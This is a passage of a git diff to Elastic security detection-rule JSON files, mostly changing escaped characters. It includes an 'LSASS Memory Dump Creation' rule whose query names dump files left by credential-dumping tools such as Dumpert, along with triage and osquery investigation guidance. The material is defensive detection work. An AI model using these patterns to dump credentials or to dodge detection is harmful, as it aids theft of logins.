instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_103.json b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_103.json index 6db41d0376c..fb4ed55f21c 100644 --- a/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_103.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_104.json b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_104.json index 2ea0b4b2f35..69743719c8d 100644 --- a/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_105.json b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_105.json index 613e5ee7dea..1e59fa2e7d3 100644 --- a/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_105.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_103.json b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_103.json index 765420ada35..0dd203f4bc1 100644 --- a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_103.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Creation", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\SqlDumper.exe\", \"?:\\\\Windows\\\\System32\\\\dllhost.exe\") and\n file.path : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\ErrorDumps\\\\SQLDmpr*.mdmp\",\n \"?:\\\\*\\\\Reporting Services\\\\Logfiles\\\\SQLDmpr*.mdmp\")) and\n\n not (process.executable : \"?:\\\\WINDOWS\\\\system32\\\\WerFault.exe\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\lsass.exe.*.dmp\")\n", "references": [ "https://github.com/outflanknl/Dumpert", @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_104.json b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_104.json index dff76f9bd6c..f64eb0efcfb 100644 --- a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Creation", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\SqlDumper.exe\", \"?:\\\\Windows\\\\System32\\\\dllhost.exe\") and\n file.path : (\"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\ErrorDumps\\\\SQLDmpr*.mdmp\",\n \"?:\\\\*\\\\Reporting Services\\\\Logfiles\\\\SQLDmpr*.mdmp\")) and\n\n not (process.executable : \"?:\\\\WINDOWS\\\\system32\\\\WerFault.exe\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\lsass.exe.*.dmp\")\n", "references": [ "https://github.com/outflanknl/Dumpert", @@ -54,7 +54,7 @@ ], "risk_score": 73, "rule_id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_105.json b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_105.json index 2c9d80546d3..36dc32c957f 100644 --- a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "LSASS Memory Dump Creation", - "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 